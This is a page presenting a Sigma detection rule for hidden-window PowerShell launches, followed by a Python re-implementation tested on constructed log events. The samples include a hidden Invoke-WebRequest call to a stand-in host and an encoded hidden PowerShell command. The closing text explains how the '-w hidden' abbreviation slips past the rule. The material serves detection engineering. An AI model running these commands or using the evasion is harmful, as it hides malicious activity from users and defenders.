Suspicious PowerShell WindowStyle Option

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This rule looks for a PowerShell script block that launches powershell with the WindowStyle option set to Hidden, and excludes a known benign use of that pattern by the Amazon WorkSpaces configuration scripts.

Sigma rule

title: Suspicious PowerShell WindowStyle Option
id: 313fbb0a-a341-4682-848d-6d6f8c4fab7c
status: test
description: |
    Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.
    In some cases, windows that would typically be displayed when an application carries out an operation can be hidden
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md
author: frack113, Tim Shelton (fp AWS)
date: 2021/10/20
modified: 2023/01/03
tags:
    - attack.defense_evasion
    - attack.t1564.003
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'powershell'
            - 'WindowStyle'
            - 'Hidden'
    filter:
        ScriptBlockText|contains|all:
            - ':\Program Files\Amazon\WorkSpacesConfig\Scripts\'
            - '$PSScriptRoot\Module\WorkspaceScriptModule\WorkspaceScriptModule'
    condition: selection and not filter
falsepositives:
    - Unknown
level: medium
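The rule's selection and filter logic, re-implemented in Python and run over constructed Script Block Logging events (Event ID 4104). This is an added example written for this page, not code from SigmaHQ or from the rule's authors. It assumes Sigma's default semantics for the `contains` modifier (case-insensitive substring match), and the four sample events are constructed, not real logs.

```python
# Added example (not part of the Sigma project or this rule): re-implement the
# rule's selection/filter logic in Python and run it over constructed Script
# Block Logging events (Event ID 4104) so the match and the WorkSpaces
# false-positive filter can be seen end to end.

# Terms from the rule's `selection`. Sigma's `contains` modifier is
# case-insensitive by default, so everything is compared lowercased.
SELECTION_TERMS = ("powershell", "windowstyle", "hidden")

# Terms from the rule's `filter` (the Amazon WorkSpaces false positive).
FILTER_TERMS = (
    ":\\program files\\amazon\\workspacesconfig\\scripts\\",
    "$psscriptroot\\module\\workspacescriptmodule\\workspacescriptmodule",
)


def contains_all(text: str, terms: tuple) -> bool:
    """Sigma `|contains|all`: every term is a case-insensitive substring."""
    lowered = text.lower()
    return all(term in lowered for term in terms)


def matches_rule(event: dict) -> bool:
    """condition: selection and not filter, over the event's ScriptBlockText."""
    script_block = event.get("ScriptBlockText", "")
    return contains_all(script_block, SELECTION_TERMS) and not contains_all(
        script_block, FILTER_TERMS
    )


def run_detection(events: list) -> list:
    """Return the ScriptBlockText of every event the rule would fire on."""
    return [e["ScriptBlockText"] for e in events if matches_rule(e)]


# Constructed sample events, shaped like the fields Sigma reads from
# Microsoft-Windows-PowerShell/Operational event 4104. They are not real logs.
SAMPLE_EVENTS = [
    {
        "EventID": 4104,
        "ScriptBlockText": "Start-Process powershell.exe -ArgumentList "
        "'-WindowStyle Hidden -Command Invoke-WebRequest http://example.invalid/x'",
    },
    {
        # PowerShell accepts unambiguous parameter prefixes, so `-w hidden`
        # behaves like `-WindowStyle Hidden`; the rule's literal
        # 'WindowStyle' term does not see this form.
        "EventID": 4104,
        "ScriptBlockText": "powershell -w hidden -enc SQBFAFgA",
    },
    {
        "EventID": 4104,
        "ScriptBlockText": "Get-ChildItem -Path C:\\Windows\\Temp",
    },
    {
        # Amazon WorkSpaces configuration script: selection matches, but the
        # filter removes it.
        "EventID": 4104,
        "ScriptBlockText": "& 'C:\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\Run.ps1'; "
        "Import-Module $PSScriptRoot\\Module\\WorkspaceScriptModule\\WorkspaceScriptModule; "
        "Start-Process powershell -WindowStyle Hidden",
    },
]

if __name__ == "__main__":
    for hit in run_detection(SAMPLE_EVENTS):
        print("ALERT:", hit)
```

Only the first event fires: the WorkSpaces event is suppressed by the filter, and the second event shows the rule's main blind spot, since PowerShell accepts the abbreviated `-w hidden` (and other unambiguous prefixes of `-WindowStyle`) which never contains the literal string `WindowStyle`. Script Block Logging also has to be enabled, as the rule's `definition` notes, or no 4104 events exist to match.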
